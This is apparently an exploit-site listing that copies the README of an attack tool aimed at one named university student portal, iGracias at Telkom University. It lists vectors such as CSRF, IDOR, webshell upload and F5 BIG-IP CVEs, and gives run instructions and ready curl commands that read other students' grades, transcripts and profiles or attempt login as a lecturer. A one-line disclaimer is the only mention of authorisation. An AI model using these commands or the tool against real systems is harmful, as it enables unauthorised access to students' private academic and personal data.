Exploit for igracias-audit CVE-2020-5902

Name: Exploit for igracias-audit CVE-2020-5902
Rating: 5 (6 reviews)
2026-06-30 | CVSS 10.0
## https://sploitus.com/exploit?id=649313DD-31AD-562A-AF7A-09744ED8C4C5
# 🎯 iGracias Security Audit — Telkom University

Comprehensive security testing suite for `igracias.telkomuniversity.ac.id`.

**Stack detected:** nginx + PHP + MySQL + F5 BIG-IP  
**IP blocked from server:** Run from Indonesia IP for best results.

## 🔬 Attack Vectors

| # | Vector | Description | Risk |
|---|--------|-------------|------|
| 1 | **CSRF** | Login form has NO token — weaponize | 🔴 |
| 2 | **IDOR (Nilai/IPK)** | Baca nilai & IPK mahasiswa lain via NIM | 🔴 |
| 3 | **IDOR (Profile)** | Akses data pribadi mahasiswa lain | 🔴 |
| 4 | **Privilege Escalation** | Login sebagai role dosen/admin | 🔴 |
| 5 | **NIM Brute-Force** | Scan range NIM untuk data terekspos | 🔴 |
| 6 | **SQL Injection** | Time-based / error-based (WAF dependent) | 🟡 |
| 7 | **LFI/RFI** | File inclusion via parameter page/file | 🟡 |
| 8 | **Stored XSS** | Inject script via profile fields | 🟡 |
| 9 | **File Upload** | Upload webshell | 🟡 |
| 10 | **F5 BIG-IP CVE** | CVE-2020-5902 / CVE-2022-1388 | 🟡 |

## 🚀 Quick Start

```bash
git clone https://github.com/fahriamura/igracias-audit.git
cd igracias-audit
pip install requests
python3 igracias.py
```

### Menu

```
1) RECON       — Headers, tech stack, CSRF detection
2) AUTH        — Login, SQLi test, CSRF exploit generation
3) POST-AUTH   — IDOR (Nilai/IPK/profile), NIM brute-force, Priv Esc
4) INFRA       — F5 CVEs, directory listing, backup files
5) RUN ALL     — Full automated scan
6) REPORT      — Generate comprehensive report
0) EXIT
```

## 📁 Output

- `results/audit_report.txt` — Full security report
- `results/audit_results.json` — Machine-readable
- `results/csrf_exploit.html` — CSRF PoC (buka di browser)

## 🎯 IDOR Manual Testing (dari laptop Indonesia)

```bash
# Dapatkan session dulu (login via browser)
# Lalu dengan session cookie yang valid:

# Baca NILAI mahasiswa lain
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=nilai&nim=13011XXXX'
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=transkrip&nim=13011XXXX'
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=ipk&nim=13011XXXX'

# Baca PROFILE mahasiswa lain
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=profile&nim=13011XXXX'

# Coba akses DOSEN panel
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=dosen&id=1'
```

## 🔴 Privilege Escalation (Login Dosen)

```bash
# Coba dengan extra parameter role
curl -X POST 'https://igracias.telkomuniversity.ac.id/' \
  -d 'textUsername=USER&textPassword=PASS&role=dosen&submit=Login'
  
# Jika ada session dosen yang bocor, langsung pakai cookie-nya
curl -b 'PHPSESSID=xxxx_dosen' 'https://igracias.telkomuniversity.ac.id/index.php?page=dashboard'
```

## ⚠️ Disclaimer

For authorized security testing only. Ensure you have permission.